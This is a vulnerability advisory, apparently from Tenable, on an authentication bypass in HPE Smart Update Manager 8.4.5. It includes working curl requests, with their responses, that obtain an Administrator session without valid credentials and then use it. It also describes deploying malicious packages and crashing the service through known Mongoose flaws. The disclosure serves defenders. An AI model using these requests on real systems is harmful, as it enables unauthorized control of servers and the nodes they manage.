HPE Smart Update Manager 8.4.5 Remote Unauthorized Access

Tenable found a remote unauthorized access vulnerability in HPE Smart Update Manager (SUM) 8.4.5. An unauthenticated remote attacker can login to SUM with the following HTTP request to obtain an authenticated session id:

curl -k -H 'Content-Type: application/json' -d '{"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}}' 'https://<HPE_SUM_HOST>:63002/session/create'
{"hapi":{"hmessage":"Session already exists.","sessionId":"t963445791","hcode":0,"isSameSessionExists":true}}

With a valid session id, the attacker then can perform actions defined by the SUM application:

 curl -k 'https://<HPE_SUM_HOST>:63002/session/t963445791/node/index'
{"hapi":{"hmessage":"Command completed successfully.","hcode":0,"output_data":{"nodes":{"node":[{"return_code":"0","node_phase":"UserActionNeeded","scheduled":false,"node_uri":"/Session/t963445791/Node/N1localhost","baselines":[],"node_status_hcode":"0","installable_state":"0","group_name":"","type":"WINDOWS","group_id":"","node_id":"N1localhost","node_state":"IDLE","node_status":"Ready to start inventory","schedule_date_time":"","node_name":"localhost"}]}}}}

Specifically, the attacker can login to the SUM web UI with the obtained session id:

https://<HPE_SUM_HOST>:63002/index.html?session_id=t963445791

The security impact depends on what SUM can do. According to the SUM User Guide, it looks like update packages can be uploaded from a remote host to the SUM host (Download from http share). With this the attacker may be able to upload malicious packages from an attacker-controlled host to the SUM host. The attacker can then deploy the packages to the nodes managed by SUM. By default the SUM host (aka localhost) is automatically added to the managed node list. It appears that the vulnerability is similar to CVE-2019-11988 described in https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03922en_us. So the impact could be as high as CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.

HPE SUM 8.4.5 uses Mongoose 6.7 for web server. Mongoose 6.7 is affected by mulitple vulnerabilities, so HPE SUM is also affected. For example, the PoCs for CVE-2017-2921 (https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0428) and CVE-2017-2922 (https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0429) can be used to crash sum_service_x64.exe running on Windows.